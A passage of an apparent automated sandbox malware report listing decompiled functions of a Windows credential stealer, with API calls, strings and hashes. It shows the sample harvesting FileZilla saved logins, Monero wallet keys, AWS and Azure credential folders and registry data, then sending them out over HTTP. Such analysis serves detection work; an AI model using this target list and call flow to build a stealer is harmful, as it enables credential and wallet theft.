                  • StrStrA.SHLWAPI(00000000,<User>), ref: 002B0419
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002C0DB2), ref: 002B0427
                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 002B0463
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002C0DB2), ref: 002B0475
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002C0DB2), ref: 002B0502
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002C0DB2), ref: 002B051A
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002C0DB2), ref: 002B0532
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002C0DB2), ref: 002B054A
                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 002B0562
                  • lstrcat.KERNEL32(?,profile: null), ref: 002B0571
                  • lstrcat.KERNEL32(?,url: ), ref: 002B0580
                  • lstrcat.KERNEL32(?,00000000), ref: 002B0593
                  • lstrcat.KERNEL32(?,002C1678), ref: 002B05A2
                  • lstrcat.KERNEL32(?,00000000), ref: 002B05B5
                  • lstrcat.KERNEL32(?,002C167C), ref: 002B05C4
                  • lstrcat.KERNEL32(?,login: ), ref: 002B05D3
                  • lstrcat.KERNEL32(?,00000000), ref: 002B05E6
                  • lstrcat.KERNEL32(?,002C1688), ref: 002B05F5
                  • lstrcat.KERNEL32(?,password: ), ref: 002B0604
                  • lstrcat.KERNEL32(?,00000000), ref: 002B0617
                  • lstrcat.KERNEL32(?,002C1698), ref: 002B0626
                  • lstrcat.KERNEL32(?,002C169C), ref: 002B0635
                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002C0DB2), ref: 002B068E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                  • API String ID: 1942843190-555421843
                  • Opcode ID: b7bf2dad6185a7492dd571bda3754f5f7a2fb75afcbba2bc38062eedd218510a
                  • Instruction ID: 193693182a9486250cc3f848b4e70b6b47a19aecccfaf16ddabb7e03f2163d35
                  • Opcode Fuzzy Hash: b7bf2dad6185a7492dd571bda3754f5f7a2fb75afcbba2bc38062eedd218510a
                  • Instruction Fuzzy Hash: 31D11D71920208ABCB04FBF4DD96EEE7778FF15340F544518F102A6092DE74AA66CF66
                  Function 002A5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002BA7E6
                    • Part of subcall function 002A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 002A4839
                    • Part of subcall function 002A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 002A4849
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002A59F8
                  • StrCmpCA.SHLWAPI(?,00D5FCE0), ref: 002A5A13
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002A5B93
                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00D5FD10,00000000,?,00D5E950,00000000,?,002C1A1C), ref: 002A5E71
                  • lstrlen.KERNEL32(00000000), ref: 002A5E82
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 002A5E93
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002A5E9A
                  • lstrlen.KERNEL32(00000000), ref: 002A5EAF
                  • lstrlen.KERNEL32(00000000), ref: 002A5ED8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 002A5EF1
                  • lstrlen.KERNEL32(00000000,?,?), ref: 002A5F1B
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 002A5F2F
                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 002A5F4C
                  • InternetCloseHandle.WININET(00000000), ref: 002A5FB0
                  • InternetCloseHandle.WININET(00000000), ref: 002A5FBD
                  • HttpOpenRequestA.WININET(00000000,00D5FCD0,?,00D5F350,00000000,00000000,00400100,00000000), ref: 002A5BF8
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                  • InternetCloseHandle.WININET(00000000), ref: 002A5FC7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 874700897-2180234286
                  • Opcode ID: 31c3ae68b24d921c47b83da49d5429cf02bd0845b4d39b7a79570cf42c8d8391
                  • Instruction ID: edcc1a405ecc2f019699c94bc08bce728ffb0e1212fdaebe23d2da183680db3e
                  • Opcode Fuzzy Hash: 31c3ae68b24d921c47b83da49d5429cf02bd0845b4d39b7a79570cf42c8d8391
                  • Instruction Fuzzy Hash: 6A122D71830118BBDB15EBA0DC96FEEB378BF14740F4042A9B10662492EF706A69CF65
                  Function 002ACEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                    • Part of subcall function 002B8B60: GetSystemTime.KERNEL32(002C0E1A,00D5EC80,002C05AE,?,?,002A13F9,?,0000001A,002C0E1A,00000000,?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002B8B86
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002ACF83
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 002AD0C7
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002AD0CE
                  • lstrcat.KERNEL32(?,00000000), ref: 002AD208
                  • lstrcat.KERNEL32(?,002C1478), ref: 002AD217
                  • lstrcat.KERNEL32(?,00000000), ref: 002AD22A
                  • lstrcat.KERNEL32(?,002C147C), ref: 002AD239
                  • lstrcat.KERNEL32(?,00000000), ref: 002AD24C
                  • lstrcat.KERNEL32(?,002C1480), ref: 002AD25B
                  • lstrcat.KERNEL32(?,00000000), ref: 002AD26E
                  • lstrcat.KERNEL32(?,002C1484), ref: 002AD27D
                  • lstrcat.KERNEL32(?,00000000), ref: 002AD290
                  • lstrcat.KERNEL32(?,002C1488), ref: 002AD29F
                  • lstrcat.KERNEL32(?,00000000), ref: 002AD2B2
                  • lstrcat.KERNEL32(?,002C148C), ref: 002AD2C1
                  • lstrcat.KERNEL32(?,00000000), ref: 002AD2D4
                  • lstrcat.KERNEL32(?,002C1490), ref: 002AD2E3
                    • Part of subcall function 002BA820: lstrlen.KERNEL32(002A4F05,?,?,002A4F05,002C0DDE), ref: 002BA82B
                    • Part of subcall function 002BA820: lstrcpy.KERNEL32(002C0DDE,00000000), ref: 002BA885
                  • lstrlen.KERNEL32(?), ref: 002AD32A
                  • lstrlen.KERNEL32(?), ref: 002AD339
                    • Part of subcall function 002BAA70: StrCmpCA.SHLWAPI(00D58BC8,002AA7A7,?,002AA7A7,00D58BC8), ref: 002BAA8F
                  • DeleteFileA.KERNEL32(00000000), ref: 002AD3B4
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                  • String ID:
                  • API String ID: 1956182324-0
                  • Opcode ID: 0bc2dec8b9d0cee698211075305141ebf31b73a628eb3b2493c16f06f27a9800
                  • Instruction ID: 9b241be6c9af1bec408509a004631ddfa2cf32abb228c1430f1b3b5c79eb7dae
                  • Opcode Fuzzy Hash: 0bc2dec8b9d0cee698211075305141ebf31b73a628eb3b2493c16f06f27a9800
                  • Instruction Fuzzy Hash: 1FE10A71920108ABDB14FBA0DD96EEE7378BF14341F104168F147B6492DE35BA2ACF66
                  Function 002AC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00D5DA18,00000000,?,002C144C,00000000,?,?), ref: 002ACA6C
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 002ACA89
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 002ACA95
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 002ACAA8
                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 002ACAD9
                  • StrStrA.SHLWAPI(?,00D5D8F8,002C0B52), ref: 002ACAF7
                  • StrStrA.SHLWAPI(00000000,00D5D970), ref: 002ACB1E
                  • StrStrA.SHLWAPI(?,00D5E228,00000000,?,002C1458,00000000,?,00000000,00000000,?,00D58AA8,00000000,?,002C1454,00000000,?), ref: 002ACCA2
                  • StrStrA.SHLWAPI(00000000,00D5E208), ref: 002ACCB9
                    • Part of subcall function 002AC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 002AC871
                    • Part of subcall function 002AC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 002AC87C
                  • StrStrA.SHLWAPI(?,00D5E208,00000000,?,002C145C,00000000,?,00000000,00D58C58), ref: 002ACD5A
                  • StrStrA.SHLWAPI(00000000,00D589F8), ref: 002ACD71
                    • Part of subcall function 002AC820: lstrcat.KERNEL32(?,002C0B46), ref: 002AC943
                    • Part of subcall function 002AC820: lstrcat.KERNEL32(?,002C0B47), ref: 002AC957
                    • Part of subcall function 002AC820: lstrcat.KERNEL32(?,002C0B4E), ref: 002AC978
                  • lstrlen.KERNEL32(00000000), ref: 002ACE44
                  • CloseHandle.KERNEL32(00000000), ref: 002ACE9C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                  • String ID:
                  • API String ID: 3744635739-3916222277
                  • Opcode ID: 8d24e367c49f9f2907d7a480be1d008c2d12f0faf8da461eb0a283c80a5914f0
                  • Instruction ID: 0029d088b6df5196965e019feac4a9882a389b269d0ebe7789b62027bd5ad0ef
                  • Opcode Fuzzy Hash: 8d24e367c49f9f2907d7a480be1d008c2d12f0faf8da461eb0a283c80a5914f0
                  • Instruction Fuzzy Hash: 36E11C71920108BBDB14EBA0DC96FEEB778AF14340F504169F10667592EF307A6ACF66
                  Function 002B8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                  • RegOpenKeyExA.ADVAPI32(00000000,00D5BFD0,00000000,00020019,00000000,002C05B6), ref: 002B83A4
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 002B8426
                  • wsprintfA.USER32 ref: 002B8459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 002B847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 002B848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 002B8499
                    • Part of subcall function 002BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002BA7E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                  • String ID: - $%s\%s$?
                  • API String ID: 3246050789-3278919252
                  • Opcode ID: 1af87fbe51c5be360882de7dc302398b864dbb3809660691f93a832856901413
                  • Instruction ID: b4c98ceb001d2ceb1e375c3b3851041733ae4b311274056d5fd320287dfd3d85
                  • Opcode Fuzzy Hash: 1af87fbe51c5be360882de7dc302398b864dbb3809660691f93a832856901413
                  • Instruction Fuzzy Hash: A7810C71920118ABDB24DF54CC95FEAB7BCBF08740F0082D9E10AA6141DF716B95CFA5
                  Function 002B4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 002B8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 002B4DB0
                  • lstrcat.KERNEL32(?,\.azure\), ref: 002B4DCD
                    • Part of subcall function 002B4910: wsprintfA.USER32 ref: 002B492C
                    • Part of subcall function 002B4910: FindFirstFileA.KERNEL32(?,?), ref: 002B4943
                  • lstrcat.KERNEL32(?,00000000), ref: 002B4E3C
                  • lstrcat.KERNEL32(?,\.aws\), ref: 002B4E59
                    • Part of subcall function 002B4910: StrCmpCA.SHLWAPI(?,002C0FDC), ref: 002B4971
                    • Part of subcall function 002B4910: StrCmpCA.SHLWAPI(?,002C0FE0), ref: 002B4987
                    • Part of subcall function 002B4910: FindNextFileA.KERNEL32(000000FF,?), ref: 002B4B7D
                    • Part of subcall function 002B4910: FindClose.KERNEL32(000000FF), ref: 002B4B92
                  • lstrcat.KERNEL32(?,00000000), ref: 002B4EC8
                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 002B4EE5
                    • Part of subcall function 002B4910: wsprintfA.USER32 ref: 002B49B0
                    • Part of subcall function 002B4910: StrCmpCA.SHLWAPI(?,002C08D2), ref: 002B49C5
                    • Part of subcall function 002B4910: wsprintfA.USER32 ref: 002B49E2
                    • Part of subcall function 002B4910: PathMatchSpecA.SHLWAPI(?,?), ref: 002B4A1E
                    • Part of subcall function 002B4910: lstrcat.KERNEL32(?,00D5FC40), ref: 002B4A4A
                    • Part of subcall function 002B4910: lstrcat.KERNEL32(?,002C0FF8), ref: 002B4A5C
                    • Part of subcall function 002B4910: lstrcat.KERNEL32(?,?), ref: 002B4A70
                    • Part of subcall function 002B4910: lstrcat.KERNEL32(?,002C0FFC), ref: 002B4A82
                    • Part of subcall function 002B4910: lstrcat.KERNEL32(?,?), ref: 002B4A96
                    • Part of subcall function 002B4910: CopyFileA.KERNEL32(?,?,00000001), ref: 002B4AAC
                    • Part of subcall function 002B4910: DeleteFileA.KERNEL32(?), ref: 002B4B31
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                  • API String ID: 949356159-974132213
                  • Opcode ID: 4ca3e30ecb73cd85bec9f60efc7bd5f1c013bd2e82a5f07a111b1198379574d9
                  • Instruction ID: c789eba0535670d56ee1f2927d518435524ade3fd3282183df82aebd54eb9be5
                  • Opcode Fuzzy Hash: 4ca3e30ecb73cd85bec9f60efc7bd5f1c013bd2e82a5f07a111b1198379574d9
                  • Instruction Fuzzy Hash: F241A87A96020867DB10F770DC87FED3338AB25740F4049987689A60C2EEB457F98F92
                  Function 002B9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                  Download Yara Rule
                  APIs
                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 002B906C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateGlobalStream
                  • String ID: image/jpeg
                  • API String ID: 2244384528-3785015651
                  • Opcode ID: b26f575baf9edda7667d3e7f421dc1904a7f97e3655c79c9a8a2b7c4485b0560
                  • Instruction ID: 73cf10d6d2b0587d78a72a1172e5369feba7965f151f6d85c2a2d99c327f9a1d
